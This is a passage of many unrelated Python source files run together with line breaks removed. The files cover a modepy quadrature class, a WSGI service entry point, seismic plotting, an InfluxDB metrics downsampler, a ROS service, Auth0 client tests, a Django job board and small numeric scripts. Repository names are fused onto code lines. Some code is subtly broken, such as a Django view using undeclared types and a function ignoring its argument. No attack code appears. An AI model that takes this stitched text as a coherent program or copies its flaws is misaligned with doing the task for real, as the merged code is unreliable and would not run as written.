of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import numpy as np from modepy.quadrature import Quadrature, QuadratureRuleUnavailable class VioreanuRokhlinSimplexQuadrature(Quadrature): """Simplicial quadratures with symmetric node sets and positive weights suitable for well-conditioned interpolation. The integration domain is the unit simplex. (see :ref:`tri-coords` and :ref:`tet-coords`) Raises :exc:`modepy.QuadratureRuleUnavailable` if no quadrature rule for the requested parameters is available. Inherits from :class:`modepy.Quadrature`. See there for the interface to obtain nodes and weights. .. attribute:: exact_to The total degree up to which the quadrature is exact. When using these nodes, please acknowledge Zydrunas Gimbutas, who generated them as follows: * The 2D nodes are based on the interpolation node set derived in the article and , "Spectra of Multiplication Operators as a Numerical Tool," `Yale CS Tech Report 1443 `_ Note that in Vioreanu's tables, only orders 5,6,9, and 12 are rotationally symmetric, which gives one extra order for integration and better interpolation conditioning. Also note that since the tables have been re-generated independently, the nodes and weights may be different. * The 3D nodes were derived from the :func:`modepy.warp_and_blend_nodes`. * A tightening algorithm was then applied, as described in , "Spectra of Multiplication Operators as a Numerical Tool", Yale University, 2012. `Dissertation `_ .. versionadded :: 2013.3 .. automethod:: __init__ .. automethod:: __call__ """ # FIXME: most other functionality in modepy uses 'dims, order' as the # argument order convention. def __init__(self, order, dims): """ :arg order: The total degree to which the quadrature rule is exact for *interpolation*. :arg dims: The number of dimensions for the quadrature rule. 2 for quadrature on triangles and 3 for tetrahedra. """ if dims == 2: from modepy.quadrature.vr_quad_data_tri import triangle_data as table ref_volume = 2 elif dims == 3: from modepy.quadrature.vr_quad_data_tet import tetrahedron_data as table ref_volume = 4/3 else: raise QuadratureRuleUnavailable(f"invalid domension: '{dims}'") from modepy.tools import EQUILATERAL_TO_UNIT_MAP e2u = EQUILATERAL_TO_UNIT_MAP[dims] try: order_table = table[order] except KeyError: raise QuadratureRuleUnavailable nodes = e2u(order_table["points"]) wts = order_table["weights"] wts = wts * (ref_volume/np.sum(wts)) super().__init__(nodes, wts, exact_to=order_table["quad_degree"]) src/servicelib/wsgi.py # (C) Copyright 2020- ECMWF. # # This software is licensed under the terms of the Apache Licence Version 2.0 # which can be obtained at http://www.apache.org/licenses/LICENSE-2.0. # # In applying this licence, ECMWF does not waive the privileges and immunities # granted to it by virtue of its status as an intergovernmental organisation # nor does it submit to any jurisdiction. """WSGI entry point module for servicelib workers.""" from __future__ import absolute_import, unicode_literals import atexit import os import falcon from servicelib import config, inventory, logutils, registry from servicelib.compat import raise_from from servicelib.falcon import HealthResource, StatsResource, WorkerResource __all__ = [ "application", ] # On y va! logutils.configure_logging( level=config.get("log.level", default="debug").upper(), log_type=config.get("log.type", default="text"), ) application = falcon.API(media_type=falcon.MEDIA_JSON) try: services = inventory.instance().load_services() application.add_route("/services/{service}", WorkerResource(services)) # Now that routes for services have been set up, we may add the services we # host here to the service registry. worker_hostname = config.get("worker.hostname") worker_port = config.get("worker.port") service_urls = [ (name, "http://{}:{}/services/{}".format(worker_hostname, worker_port, name,),) for name in services ] registry.instance().register(service_urls) # Now that routes for services have been set up, we are ready to # handle requests. Let Kubernetes know (or whoever may be sending # health check probes) by enabling the health check route. application.add_route("/health", HealthResource()) # When we die, try reporting it to the registry. @atexit.register def unregister(): registry.instance().unregister(service_urls) application.add_route("/stats", StatsResource()) except Exception as exc: # If we're running under `pytest-cov`, call `pytest_cov.embed.cleanup()` # so that we do not lose coverage info for this Python module. if os.environ.get("COV_CORE_DATAFILE"): # pragma: no branch from pytest_cov.embed import cleanup cleanup() raise_from(exc, exc) # pragma: no cover GeoCode-polymtl/Deep_1D_velocity from vrmslearn.ModelParameters import ModelParameters from vrmslearn.SeismicGenerator import SeismicGenerator, mute_direct import argparse import matplotlib.pyplot as plt import numpy as np import os from shutil import rmtree import h5py as h5 def plot_two_gathers(data1, data2, pars): """ Compares two shot gathers @params: @returns: """ # Plot results fig, ax = plt.subplots(1, 2, figsize=[16, 8]) clip = 0.1 vmax = np.max(data1) * clip vmin = -vmax ax[0].imshow(data1, interpolation='bilinear', cmap=plt.get_cmap('Greys'), vmin=vmin, vmax=vmax, aspect='auto') clip = 0.1 vmax = np.max(data2) * clip vmin = -vmax ax[1].imshow(data2, interpolation='bilinear', cmap=plt.get_cmap('Greys'), vmin=vmin, vmax=vmax, aspect='auto') plt.show() def plot_two_traces(data1, data2, pars): """ Compares two shot gathers @params: @returns: """ # Plot results fig, ax = plt.subplots(2, 1, figsize=[16, 8]) clip = 0.1 vmax = np.max(data1) * clip vmin = -vmax ax[0].plot(data1[:,1]) ax[1].plot(data2[:,1]) plt.show() if __name__ == "__main__": parser = argparse.ArgumentParser() # Add arguments to parse parser.add_argument("-f1", "--filename1", type=str, default="", help="name of the file containing the synth data") parser.add_argument("-f2", "--filename2", type=str, default="", help="name of the file containing the real data") # Parse the input args = parser.parse_args() def print_usage_error_message(): print("\nUsage error.\n") parser.print_help() pars = ModelParameters() pars.dh = 6.25 pars.peak_freq = 26 pars.NX = 692 * 2 pars.NZ = 752 * 2 pars.dt = 0.0004 pars.NT = int(8.0 / pars.dt) pars.resampling = 10 pars.dg = 8 pars.gmin = int(470 / pars.dh) pars.gmax = int((470 + 72 * pars.dg * pars.dh) / pars.dh) pars.minoffset = 470 pars.vp_min = 1300.0 # maximum value of vp (in m/s) pars.vp_max = 4000.0 # minimum value of vp (in m/s) pars.marine = True pars.velwater = 1500 pars.d_velwater = 60 pars.water_depth = 3500 pars.dwater_depth = 1000 pars.fs = False pars.source_depth = (pars.Npad + 4) * pars.dh pars.receiver_depth = (pars.Npad + 4) * pars.dh pars.identify_direct = False file = h5.File(args.filename1, "r") data1 = file['data'][:] vp = file['vp'][:] data1 = mute_direct(data1, vp[0], pars) file.close() file = h5.File(args.filename2, "r") data2 = file["data_cmp"][:data1.shape[0], 1:72] file.close() plot_two_gathers(data1, data2, pars) plot_two_traces(data1, data2, pars) # 从excel读入数据存为data import pandas as pd import numpy as np data = pd.read_excel('../data/questionnaire2.xlsx', sheet_name=1) # data = pd.read_excel('../data/all.xlsx', sheet_name=0) print(data.head()) print(len(data.index.values)) print(len(data.columns.values)) data_array = np.array(data) print(data_array.shape[0], data_array.shape[1]) print(data_array) np.save('../data/q2_label.npy', data_array) import argparse from influxdb import InfluxDBClient import pandas as pd from time import sleep, time SELECT_REQUESTS_DATA = 'select response_time, request_name, method, status, status_code from {} ' \ 'where time>\'{}\'' SELECT_USERS_DATA = 'select active from "users" where time>\'{}\'' def get_args(): parser = argparse.ArgumentParser(description='Simlog parser.') parser.add_argument("-t", "--type", help="Test type.") parser.add_argument("-s", "--simulation", help='Test simulation', default=None) parser.add_argument("-b", "--build_id", help="build ID", default=None) parser.add_argument("-en", "--env", help="Test type.", default=None) parser.add_argument("-i", "--influx_host", help='InfluxDB host or IP', default=None) parser.add_argument("-p", "--influx_port", help='InfluxDB port', default=8086) parser.add_argument("-iu", "--influx_user", help='InfluxDB user', default="") parser.add_argument("-ip", "--influx_password", help='InfluxDB password', default="") parser.add_argument("-idb", "--influx_db", help='Test results InfluxDB', default="jmeter") parser.add_argument("-l", "--lg_id", help='Load generator ID', default=None) return vars(parser.parse_args()) def resample_results(requests, aggregation, status): downsampled_array = [] start_time_ = time() for req in requests: _response_times = [0 if v is None else v for v in requests[req]["response_times"]] dti = pd.to_datetime(requests[req]["timestamps"]) rt_ts = pd.Series(_response_times, index=dti) total = rt_ts.resample(aggregation, label='right').count() min_ = rt_ts.resample(aggregation, label='right').min() max_ = rt_ts.resample(aggregation, label='right').max() median = rt_ts.resample(aggregation, label='right').median() pct_90 = rt_ts.resample(aggregation, label='right').quantile(0.9) pct_95 = rt_ts.resample(aggregation, label='right').quantile(0.95) pct_99 = rt_ts.resample(aggregation, label='right').quantile(0.99) status_codes = {} for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx", "NaN"]: sc_ts = pd.Series(requests[req][status_code], index=dti) status_codes[status_code] = sc_ts.resample(aggregation, label='right').sum() _timestamps = list(total.keys()) for i in range(len(total)): try: if int(total.iloc[i]) != 0: downsampled_array.append({ "time": _timestamps[i].to_pydatetime().strftime('%Y-%m-%dT%H:%M:%SZ'), "request_name": requests[req]["request_name"], "method": requests[req]["method"], "status": status, "total": total.iloc[i], "min": int(min_.iloc[i]), "max": int(max_.iloc[i]), "median": int(median.iloc[i]), "pct90": int(pct_90.iloc[i]), "pct95": int(pct_95.iloc[i]), "pct99": int(pct_99.iloc[i]), "1xx": status_codes["1xx"].iloc[i], "2xx": status_codes["2xx"].iloc[i], "3xx": status_codes["3xx"].iloc[i], "4xx": status_codes["4xx"].iloc[i], "5xx": status_codes["5xx"].iloc[i], "NaN": status_codes["NaN"].iloc[i], }) except Exception: pass print(f"Downsampling time for {aggregation} - {round(time() - start_time_, 2)} seconds") return downsampled_array def resample_and_send_to_influx(client, args, ok_requests, ko_requests, aggregation, iteration): requests = resample_results(ok_requests, aggregation, "OK") requests.extend(resample_results(ko_requests, aggregation, "KO")) points = [] for req in requests: sampler_type = "TRANSACTION" if req['method'] == "TRANSACTION" else "REQUEST" influx_record = { "measurement": f"{args['simulation']}_{aggregation.replace('T', 'm').lower()}", "tags": { "iteration": iteration, "simulation": args['simulation'], "env": args['env'], "test_type": args['type'], "build_id": args['build_id'], "lg_id": args['lg_id'], "request_name": req['request_name'], "method": req['method'], "sampler_type": sampler_type, }, "time": req["time"], "fields": { "total": req["total"], "status": req["status"], "1xx": req["1xx"], "2xx": req["2xx"], "3xx": req["3xx"], "4xx": req["4xx"], "5xx": req["5xx"], "NaN": req["NaN"], "min": req["min"], "max": req["max"], "median": req["median"], "pct90": req["pct90"], "pct95": req["pct95"], "pct99": req["pct99"], } } points.append(influx_record) client.write_points(points) def resample_users_and_send_to_influx(client, args, users_data, aggregation): downsampled_array = [] users_ts = pd.Series(users_data["active"], index=pd.to_datetime(users_data["timestamps"])) active = users_ts.resample(aggregation, label='right').max() _timestamps = list(active.keys()) for i in range(len(active)): try: downsampled_array.append({ "time": _timestamps[i].to_pydatetime().strftime('%Y-%m-%dT%H:%M:%SZ'), "active": int(active.iloc[i]), }) except Exception: pass points = [] for _each in downsampled_array: influx_record = { "measurement": f"users_{aggregation.replace('T', 'm').lower()}", "tags": { "simulation": args['simulation'], "env": args['env'], "test_type": args['type'], "build_id": args['build_id'], "lg_id": args['lg_id'], }, "time": _each["time"], "fields": { "active": _each["active"], } } points.append(influx_record) client.write_points(points) def aggregate_results(_results): _ok_requests = {} _ko_requests = {} for each in requests_data: if each["status"] == "OK": append_request(_ok_requests, each) else: append_request(_ko_requests, each) return _ok_requests, _ko_requests def append_request(requests, req): key = f"{req['request_name']}_{req['method']}" if key not in requests: requests[key] = { "timestamps": [req["time"]], "request_name": req["request_name"], "method": req["method"], "response_times": [req["response_time"]], "1xx": [], "2xx": [], "3xx": [], "4xx": [], "5xx": [], 'NaN': [] } if "{}xx".format(str(req['status_code'])[0]) in requests[key]: requests[key]["NaN"].append(0) for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx"]: if status_code[0] == str(req['status_code'])[0]: requests[key][status_code].append(1) else: requests[key][status_code].append(0) else: requests[key]["NaN"].append(1) for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx"]: requests[key][status_code].append(0) else: requests[key]["timestamps"].append(req["time"]) requests[key]["response_times"].append(req["response_time"]) if "{}xx".format(str(req['status_code'])[0]) in requests[key]: requests[key]["NaN"].append(0) for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx"]: if status_code[0] == str(req['status_code'])[0]: requests[key][status_code].append(1) else: requests[key][status_code].append(0) else: requests[key]["NaN"].append(1) for status_code in ["1xx", "2xx", "3xx", "4xx", "5xx"]: requests[key][status_code].append(0) def append_to_batch(batch, requests): for key in requests: if key not in list(batch.keys()): batch[key] = requests[key] else: for each in ["timestamps", "response_times", "1xx", "2xx", "3xx", "4xx", "5xx", "NaN"]: batch[key][each].extend(requests[key][each]) if __name__ == '__main__': args = get_args() external_client = InfluxDBClient(args["influx_host"], args["influx_port"], args["influx_user"], args["influx_password"], args["influx_db"]) local_client = InfluxDBClient("localhost", "8086", "", "", "local") requests_last_read_time = '1970-01-01T19:25:26.005Z' users_last_read_time = '1970-01-01T19:25:26.005Z' iteration = 0 processing_time = 0 ok_requests_10min_batch, ko_requests_10min_batch, ok_requests_5min_batch, ko_requests_5min_batch = {}, {}, {}, {} users_10min_batch, users_5min_batch = {"timestamps": [], "active": []}, {"timestamps": [], "active": []} while True: iteration += 1 pause = 60 - processing_time if processing_time < 60 else 1 sleep(pause) tik = time() requests_data = list(local_client.query(SELECT_REQUESTS_DATA.format(args["simulation"], requests_last_read_time)).get_points()) users_data = list(local_client.query(SELECT_USERS_DATA.format(users_last_read_time)).get_points()) if requests_data: requests_last_read_time = requests_data[-1]['time'] users_last_read_time = users_data[-1]['time'] ok_requests, ko_requests = aggregate_results(requests_data) append_to_batch(ok_requests_5min_batch, ok_requests) append_to_batch(ko_requests_5min_batch, ko_requests) resample_and_send_to_influx(external_client, args, ok_requests, ko_requests, "1S", iteration) resample_and_send_to_influx(external_client, args, ok_requests, ko_requests, "5S", iteration) resample_and_send_to_influx(external_client, args, ok_requests, ko_requests, "30S", iteration) # Resample users data users = {"timestamps": [], "active": []} for each in users_data: users["timestamps"].append(each["time"]) users["active"].append(each["active"]) users_5min_batch["timestamps"].extend(users["timestamps"]) users_5min_batch["active"].extend(users["active"]) resample_users_and_send_to_influx(external_client, args, users, "1S") resample_users_and_send_to_influx(external_client, args, users, "5S") resample_users_and_send_to_influx(external_client, args, users, "30S") if iteration in [5, 10]: resample_and_send_to_influx(external_client, args, ok_requests_5min_batch, ko_requests_5min_batch, "1T", iteration) resample_and_send_to_influx(external_client, args, ok_requests_5min_batch, ko_requests_5min_batch, "5T", iteration) append_to_batch(ok_requests_10min_batch, ok_requests_5min_batch) append_to_batch(ko_requests_10min_batch, ko_requests_5min_batch) del ok_requests_5min_batch del ko_requests_5min_batch ok_requests_5min_batch, ko_requests_5min_batch = {}, {} # Resample users data resample_users_and_send_to_influx(external_client, args, users_5min_batch, "1T") resample_users_and_send_to_influx(external_client, args, users_5min_batch, "5T") users_10min_batch["timestamps"].extend(users_5min_batch["timestamps"]) users_10min_batch["active"].extend(users_5min_batch["active"]) del users_5min_batch users_5min_batch = {"timestamps": [], "active": []} if iteration == 10: resample_and_send_to_influx(external_client, args, ok_requests_10min_batch, ko_requests_10min_batch, "10T", iteration) del ok_requests_10min_batch del ko_requests_10min_batch ok_requests_10min_batch, ko_requests_10min_batch = {}, {} # Resample users data resample_users_and_send_to_influx(external_client, args, users_10min_batch, "10T") del users_10min_batch users_10min_batch = {"timestamps": [], "active": []} iteration = 0 processing_time = round(time() - tik, 2) print(f"Total time - {processing_time} sec") #!/usr/bin/env python from agv2_smach.srv import * import rospy def task_plan_func(req): req_task = req.request_task rospy.init_node('agv_task_plan_service') agv_task = list(rospy.get_param('~Tasks/' + req_task)) print(agv_task) return TaskServiceResponse(str(agv_task)) def task_plan(): rospy.init_node('agv_task_plan_service') s = rospy.Service('agv_task_service', TaskService, task_plan_func) rospy.spin() if __name__ == "__main__": task_plan() import unittest import mock from auth0_client.v3.management.rules import Rules class TestRules(unittest.TestCase): @mock.patch('auth0_client.v3.management.rules.RestClient') def test_all(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') # with default params c.all() args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules', args[0]) self.assertEqual(kwargs['params'], {'fields': None, 'include_fields': 'true', 'enabled': 'true', 'stage': 'login_success', 'page': None, 'per_page': None, 'include_totals': 'false'}) # with stage and fields params c.all(stage='stage', enabled=False, fields=['a', 'b'], include_fields=False) args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules', args[0]) self.assertEqual(kwargs['params'], {'fields': 'a,b', 'include_fields': 'false', 'enabled': 'false', 'stage': 'stage', 'page': None, 'per_page': None, 'include_totals': 'false'}) # with pagination params c.all(page=3, per_page=27, include_totals=True) args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules', args[0]) self.assertEqual(kwargs['params'], {'fields': None, 'include_fields': 'true', 'enabled': 'true', 'stage': 'login_success', 'page': 3, 'per_page': 27, 'include_totals': 'true'}) @mock.patch('auth0_client.v3.management.rules.RestClient') def test_create(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') c.create({'a': 'b', 'c': 'd'}) args, kwargs = mock_instance.post.call_args self.assertEqual('https://domain/api/v2/rules', args[0]) self.assertEqual(kwargs['data'], {'a': 'b', 'c': 'd'}) @mock.patch('auth0_client.v3.management.rules.RestClient') def test_get(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') c.get('an-id') args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules/an-id', args[0]) self.assertEqual(kwargs['params'], {'fields': None, 'include_fields': 'true'}) c.get('an-id', fields=['a', 'b'], include_fields=False) args, kwargs = mock_instance.get.call_args self.assertEqual('https://domain/api/v2/rules/an-id', args[0]) self.assertEqual(kwargs['params'], {'fields': 'a,b', 'include_fields': 'false'}) @mock.patch('auth0_client.v3.management.rules.RestClient') def test_delete(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') c.delete('an-id') mock_instance.delete.assert_called_with( 'https://domain/api/v2/rules/an-id' ) @mock.patch('auth0_client.v3.management.rules.RestClient') def test_update(self, mock_rc): mock_instance = mock_rc.return_value c = Rules(domain='domain', token='') c.update('an-id', {'a': 'b', 'c': 'd'}) args, kwargs = mock_instance.patch.call_args self.assertEqual('https://domain/api/v2/rules/an-id', args[0]) self.assertEqual(kwargs['data'], {'a': 'b', 'c': 'd'}) from simple_object_tracking.trackers.centroid_tracker import PointTracker """empty message Revision ID: Revises: Create Date: 2017-10-14 19:45:52.372000 """ # revision identifiers, used by Alembic. revision = '' down_revision = '' from alembic import op import sqlalchemy as sa def upgrade(): # ### commands auto generated by Alembic - please adjust! ### pass # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### pass # ### end Alembic commands ### import sqlite3 #criar banco de dados conn=sqlite3.connect('usersdatabase.db') c=conn.cursor() sql=""" DROP TABLE IF EXISTS users; CREATE TABLE users ( id integer unique primary key autoincrement, name text); """ # Tabela users com duas colunas(id e nome). c.executescript(sql) print('[SISTEMA] Banco de dados criado com sucesso!') conn.commit() conn.close() # application configs loaded during boot class ConnectionConfig: connection_details = None avro_topics = None logger_details = None # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the License); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an AS IS BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Connection between two entities.""" class Connection(object): """A connection between a source and target entity with a certain type. The target entity is implied to be the same as the entity that contains this Connection instance. Attributes: ctype: type of the connection (NOTE: 'type' is a reserved Python keyword) source: GUID of the source entity """ def __init__(self, ctype, source): super().__init__() self.ctype = ctype self.source = source def __eq__(self, other): return self.ctype == other.ctype and self.source == other.source def __hash__(self) -> int: return hash((self.ctype, self.source)) tests/fft/test_fft.py from __future__ import print_function, unicode_literals, absolute_import, division import numpy as np import numpy.testing as npt from itertools import product from termcolor import colored from gputools import fft, fft_convolve, fft_plan, init_device #init_device(id_platform = 0, id_device = 1) def report_str(success): return colored("\t[OK]", "blue") if success else colored("\t[FAIL]", "red") def _compare_fft_np(d): res1 = np.fft.fftn(d) res2 = fft(d, fast_math=True) return res1, res2 def test_compare(): for ndim in [1, 2, 3]: for dshape in product([32, 64, 128], repeat=ndim): d = np.random.uniform(-1, 1, dshape).astype(np.complex64) res1, res2 = _compare_fft_np(d) print("validating fft of size", d.shape) npt.assert_allclose(res1, res2, rtol=1.e-0, atol=1.e-1) if __name__ == '__main__': # test_compare() # dshape = (128, 128) np.random.seed(0) d = np.random.uniform(-1, 1, dshape).astype(np.complex64) res1 = np.fft.fftn(d) res2 = fft(d) danjac/jcasts10-100 # Generated by Django 3.2.8 on 2021-11-06 13:10 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("podcasts", "0078_podcast_frequency"), ] operations = [ migrations.AddField( model_name="podcast", name="scheduled", field=models.DateTimeField(blank=True, null=True), ), ] liRONCO11/optimus import os from optimus.helpers.logger import logger from optimus.helpers.functions import prepare_path_local, path_is_local class Save: def __init__(self, root): self.root = root def json(self, path, storage_options=None, conn=None, *args, **kwargs): """ Save data frame in a json file :param path: path where the spark will be saved. :param mode: Specifies the behavior of the save operation when data already exists. "append": Append contents of this DataFrame to existing data. "overwrite" (default case): Overwrite existing data. "ignore": Silently ignore this operation if data already exists. "error": Throw an exception if data already exists. :param num_partitions: the number of partitions of the DataFrame :return: """ df = self.root.data if conn is not None: path = conn.path(path) storage_options = conn.storage_options try: os.makedirs(path, exist_ok=True) df.to_json(filename=path, storage_options=storage_options, *args, **kwargs) except (OSError, IOError) as error: logger.print(error) raise # print("Creation of the directory %s failed" % path) # else: # print("Successfully created the directory %s" % path) def csv(self, path, mode="wt", index=False, single_file=True, storage_options=None, conn=None, **kwargs): """ Save data frame to a CSV file. :param mode: 'rb', 'wt', etc :param single_file: :param index: :param path: path where the spark will be saved. it uses the default value. :return: Dataframe in a CSV format in the specified path. """ df = self.root.data if conn is not None: path = conn.path(path) storage_options = conn.storage_options try: if path_is_local(path): prepare_path_local(path) df.to_csv(filename=path, mode=mode, index=index, single_file=single_file, storage_options=storage_options, **kwargs) except IOError as error: logger.print(error) raise def parquet(self, path, mode="overwrite", num_partitions=1, engine="pyarrow", storage_options=None, conn=None, **kwargs): """ Save data frame to a parquet file :param path: path where the spark will be saved. :param mode: Specifies the behavior of the save operation when data already exists. "append": Append contents of this DataFrame to existing data. "overwrite" (default case): Overwrite existing data. "ignore": Silently ignore this operation if data already exists. "error": Throw an exception if data already exists. :param num_partitions: the number of partitions of the DataFrame :return: """ # This character are invalid as column names by parquet invalid_character = [" ", ",", ";", "{", "}", "(", ")", "\n", "\t", "="] def func(col_name): for i in invalid_character: col_name = col_name.replace(i, "_") return col_name df = self.root.cols.rename(func) if conn is not None: path = conn.path(path) storage_options = conn.storage_options dfd = df.data try: if engine == 'pyarrow': dfd.to_parquet(path, engine='pyarrow', storage_options=storage_options, **kwargs) elif engine == "fastparquet": dfd.to_parquet(path, engine='fastparquet', storage_options=storage_options, **kwargs) except IOError as e: logger.print(e) raise @staticmethod def avro(path): raise NotImplementedError('Not implemented yet') 0 """ Script to log rasppi cpu temp """ import os import datetime import itertools import time def get_cpu_temp(): res = os.popen('vcgencmd measure_temp').readline() res = res.replace("temp=", "").replace("'C\n", "") return float(res) class Sensor: def __iter__(self): return self def __next__(self): return get_cpu_temp() sensor = Sensor() timestamps = iter(datetime.datetime.now, None) for stamp, value in itertools.islice(zip(timestamps, sensor), 10): print(stamp, value) time.sleep(1) import ipdb import numpy as np import matplotlib.pyplot as plt results = { 'Garbage': [ 0.359357, 0.345487, 0.300246 ], 'Simple Features': [ 0.344599, 0.422152, 0.390513 ], '+ Physicochemical': [ 0.527414, 0.625990, 0.506098 ], '+ Single Amino Acids': [ 0.532850, 0.641846, 0.537188 ], '+ Dipeptide': [ 0.537295, 0.642724, 0.583942 ] } width = 0.2 ind = np.arange(5) fig, ax = plt.subplots() log_regression = list() gb_trees = list() knearest_neighbors = list() labels = ['Garbage', 'Simple Features', '+ Physicochemical', '+ Single Amino Acids', '+ Dipeptide'] for key in labels: log_regression.append(results[key][0]) gb_trees.append(results[key][1]) knearest_neighbors.append(results[key][2]) opacity = 0.5 log_regression_bars = ax.bar(ind, log_regression, width, color='r', alpha=opacity) gb_trees_bars = ax.bar(ind+width, gb_trees, width, color='b', alpha=opacity) knearest_neighbors_bars = ax.bar(ind+2*width, knearest_neighbors, width, color='g', alpha=opacity) # add some text for labels, title and axes ticks ax.set_ylabel('Accuracy') ax.set_title('Accuracy by model and features') ax.set_xticks(ind + width / 2) ax.set_xticklabels(labels, rotation=10) ax.legend((log_regression_bars[0], gb_trees_bars[0], knearest_neighbors_bars[0]), ('Logistic Regression', 'Gradient Boosted Trees', 'K Nearest Neighbor')) #plt.show() plt.savefig('report/histogram.png') import numpy as np import sys def cof_input(i, state): while True: try: show = 'x' if state == 0 else 'b' var = float(input(f"Коэффициент при {show}{i+1}: ")) except ValueError: print("Неверное значение, попробуйте снова") else: return var n = int(input("Введите размерность матрицы: ")) print("\nВведите коэффициенты при \'x\'", end='\n') x = [[cof_input(i, 0) for i in range(n)] for j in range(n)] x_copy = [row[:] for row in x] print("\nВведите свободные коэффициенты", end='\n') b = [cof_input(i, 1) for i in range(n)] norm_b = max(b) print("\nМатрица:", end='\n') for s in x: print(s, end='\n') print("\nСвободные коэффициенты:", end='\n') for s in b: print(s, end='\n') count = 0 for j in range(count, n - 1): for i in range(count, n - 1): if not x[j][j]: x[j], x[j + 1] = x[j + 1], x[j] b[j], b[j + 1] = b[j + 1], b[j] m = - x[i + 1][j] / x[j][j] mx = [m*l for l in x[j]] b[i + 1] += m * b[j] for k in range(n): x[i + 1][k] += mx[k] count += 1 for i in range(n): x[i].reverse() x.reverse() b.reverse() roots_vect = [] for i in range(n): for j in range(n): if i == n - 1: for k in range(n - 1): b[i] -= roots_vect[k] * x[i][k] roots_vect.append(b[i] / x[i][n - 1]) break if x[i][j + 1] == 0: roots_vect.append(b[i] / x[i][j]) break else: b[i] -= roots_vect[j] * x[i][j] roots_vect.reverse() format_roots = [f"x{i + 1}: {roots_vect[i]}; " for i in range(len(roots_vect))] print("\nКорни СЛАУ: ", "".join(format_roots)) print("\nОбратная матрица системы:", end='\n') try: inv = np.linalg.inv(x_copy) except np.linalg.LinAlgError: print("Невозможно найти обратную матрицу") else: print("{}".format(inv)) norm_x = max(sum(x_copy[i]) for i in range(n)) norm_inv = max(sum(inv[i]) for i in range(n)) norm_roots = max(roots_vect) abs_b = 0.001 rel_b = abs_b / norm_b abs_x = norm_inv * abs_b rel_x = norm_x * norm_inv * rel_b print(f"\nАбсолютная погрешность x = {abs_x}", f"Относительная погрешность x <= {rel_x}\n") file = open('attendance.txt', 'r') lines = file.read().split('\n') print(lines) if lines[0] == '': exit(0) for l in lines: print("H")Jeanluis019/feline from __future__ import annotations from django.shortcuts import render from django.views.generic import DetailView, ListView, CreateView from .models import Company, JobPost class JobPostListView(ListView): model = JobPost paginate_by = 10 jobpost_list_view = JobPostListView.as_view() class JobPostDetailView(DetailView): model = JobPost slug_field = "slug" slug_url_kwarg = "slug" jobpost_detail_view = JobPostDetailView.as_view() class JobPostCreateView(CreateView): model = JobPost success_url = "/" fields = ['company', 'location', 'how_to_apply', 'application_url', 'application_email', 'job_type', 'category', 'tags', 'currency','salary_range_start_at', 'salary_range_end_at', 'sponsor_relocation'] def get_context_data(self, **kwargs: Any) -> Dict[str, Any]: context = super().get_context_data(**kwargs) context['form'].fields['company'].queryset = Company.objects.filter(user=self.request.user) return context jobpost_create_view = JobPostCreateView.as_view()profiling/random_removes_list.py0 import random import sys import time l = list() LIST_SIZE = 200000 MININT = -sys.maxsize - 1 for i in range(LIST_SIZE): l.append(random.randint(MININT, sys.maxsize)) AMOUNT_OF_REMOVES = 50000 START_TIME = time.time() for i in range(AMOUNT_OF_REMOVES): l.pop(random.randint(0, LIST_SIZE - 1)) LIST_SIZE -= 1 print("Time taken: ", time.time() - START_TIME) thepolicylab/DLT-RESEAsrc/dlt/power_analysis_utils.py from typing import List, Optional, Tuple, Union import numpy as np import pandas as pd def _convert_seed_to_randomstate( seed: Optional[Union[int, np.random.mtrand.RandomState]] ) -> np.random.mtrand.RandomState: if not seed: return np.random if isinstance(seed, int): return np.random.RandomState(seed) return seed def gen_annual_income( number_control_per_week: Union[int, List[int]], effect_size: float, inc_base_rate: int = 36_121, inc_base_std: int = 5_000, inc_treatment_std: int = 5_000, number_of_weeks: int = 13, number_treat_per_week: int = 150, seed: Optional[Union[int, np.random.mtrand.RandomState]] = 189389, ) -> Tuple[pd.DataFrame, pd.DataFrame]: """ Generates annual income before and after RESEA intervention according to a normal distribution using `np.random.randn`. The initial_value is used in generating outcome_value to ensure some correlation. Args: number_control_per_week: a single number if control does not vary weekly. List of int otherwise effect_size: used to define the treatment effect, which modifies the mean of generated data inc_base_rate: average income per capita in RI in 2019 according to https://www.census.gov/quickfacts/fact/table/RI,US/INC110219 inc_base_std: standard deviation for the normal distribution generation inc_treatment_std: given the randomness of assignemnt to treatment, there should be no difference between base and treatment a priori number_of_weeks: how many cohorts we want to generate. Defaults to 13 because we generate data quarterly number_treat_per_week: number of individuals selected for treatment. Defaults to 150 based on DLT's experiment design seed: seed for randomization Returns: treated_df, control_df """ random = _convert_seed_to_randomstate(seed) # Define the effect inc_treatment_effect = inc_base_rate * 